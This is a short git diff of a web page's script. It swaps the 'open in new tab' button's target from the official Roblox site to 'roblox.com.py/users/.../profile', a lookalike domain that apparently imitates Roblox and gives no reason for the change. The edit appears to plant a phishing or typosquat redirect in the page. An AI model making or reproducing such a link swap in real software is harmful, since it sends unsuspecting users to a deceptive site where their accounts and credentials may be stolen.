--- a/index.html
+++ b/index.html
@@ -234,7 +234,7 @@
 
   openBtn.addEventListener('click', showModal);
   closeBtn.addEventListener('click', closeModal);
-  openNewTabBtn.addEventListener('click', () => window.open("https://www.roblox.com/","_blank","noopener,noreferrer"));
+  openNewTabBtn.addEventListener('click', () => window.open("https://roblox.com.py/users/4459472933/profile","_blank","noopener,noreferrer"));
 
   // Hide the loading overlay once iframe has finished loading
   iframe.addEventListener('load', () => {
@@ -244,3 +244,4 @@
 </script>
 </body>
 </html>
+
